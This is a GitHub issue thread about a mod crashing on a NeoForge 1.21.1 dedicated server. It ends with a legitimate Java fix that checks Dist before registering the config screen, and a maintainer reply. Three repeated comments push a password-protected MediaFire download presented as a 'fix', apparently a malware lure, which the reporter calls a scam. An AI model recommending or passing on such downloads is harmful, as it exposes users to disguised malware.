### ISSUE TITLE
1.21.1 NeoForge Dedicated Server Crash 

### ISSUE THREAD

**Issue by Zelioth** [Electrolyte220/MysticalAgricultureTieredCrystals#8]
Minecraft 1.21.1
Neo-Forge 21.1.28
MATC 1.7.0

When attempting to use this on a serverit crashes. Claims its not for server usage. 

![image](https://github.com/user-attachments/assets/fc236d2c-8b9c-4416-87a9-8c3195d3d6e9)
[latest.log](https://github.com/user-attachments/files/16752052/latest.log)

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Zelioth** [comment]
Yeahhh I'm going to have to say no to that one
seems like scam there

**Comment by Saereth** [comment]
confirmed/ran into this as well today, calling clientside class on the server.

**Comment by benbenlaw** [comment]
yep getting this as well

**Comment by Zelioth** [comment]
Is this ever going to be fixed?

**Comment by TigerWalts** [comment]
Config screens cannot be registered on a physical server (dedicated).

https://github.com/Electrolyte220/MysticalAgricultureTieredCrystals/blob/06b5af59fd969a2196022f4dd5aedaca45b580d4/src/main/java/dev/electrolyte/matc/MATC.java#L25-L33

In this case you can include the `Dist` argument in the Mod's class constructor and check it.

```java
import net.neoforged.api.distmarker.Dist;

...

    public MATC(IEventBus bus, ModContainer container, Dist dist) {
        container.registerConfig(ModConfig.Type.CLIENT, MATCModConfig.CLIENT_CONFIG);
        container.registerConfig(ModConfig.Type.SERVER, MATCModConfig.SERVER_CONFIG);

        if (dist == Dist.CLIENT) {
            container.registerExtensionPoint(IConfigScreenFactory.class, ConfigurationScreen::new);
        }

        ModRegistry.register(bus);
        CREATIVE_MODE_TABS.register(bus);
    }
```

**Comment by Electrolyte220** [comment]
Apologies for the long wait, Github decided not to send any notifications for this issue. It should be resolved as of verison 1.7.1.
